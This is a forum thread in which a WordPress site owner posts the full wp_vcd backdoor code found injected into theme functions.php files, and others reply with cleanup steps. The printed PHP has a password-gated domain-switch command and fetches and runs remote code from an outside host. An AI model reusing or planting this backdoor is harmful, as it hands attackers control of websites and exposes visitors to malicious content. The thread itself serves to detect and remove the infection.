I have a shared hosting and some wordpress websites on that.
Recently sometimes when I visit my websites, popup opens.
So I opened template directory of one wordpress website in Cpanel. this code was added on top of functions.php
file:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79'))
{
$div_code_name = "wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain))
{
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if (!function_exists('theme_temp_setup'))
{
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false)
{
if ($tmpcontent = @file_get_contents("http://www.dolsh.com/code9.php?i=" . $path))
{
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>
So I deteled that and popup problem solved. I deleted that from functions.php
files of all websites But
Now problem is that when I visit functions.php
of any websites, the code is there again and its in all themes even unused themes.
What can I do?
What I did to slove problem
wp-include
directory, delete wp-vcd.php
and class.wp.php
fileswp-include
directory, open post.php
and detele first php tag
added by Malware.functions.php
file, and delete the above codes.This should stop popups. But I don't now how long it works.
I still didn't find the main file that infect all websites, but tying to find out.
I know this answer is very late but I'll share my experience to help any one who has this problem. cause of this issue can be a plugin that you downloaded from outside of wordpress.org or some body has access to your wordpress admin account and you doesn't already close editor.php in appearance tab or hacker has your ftp user and password or ... to solve this create a full backup first and save it in your computer in case of doing any mistake and then:
functions.php
file and delete all extra code inserted by malware. you can search for wp_vcd
or wp-tmp
words to find the code.wp-include
and wp-admin
folder and all files in public_html except wp-content folder
and .htaccess
file and wp-config.php
file. after that replace deleted files and folder with downloaded wordpress.hope this little guide can help someone.
Apparently your site has been compromised (hacked). You can contact your hosting provider, they probably (surely) will not help you. You can contact a web site security company, I use sucuri.net. If you want to clean it yourself, there are 2 options
code9
that shows your code, you can look for this, but probably sometimes it's code9
and sometimes is a different name.If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With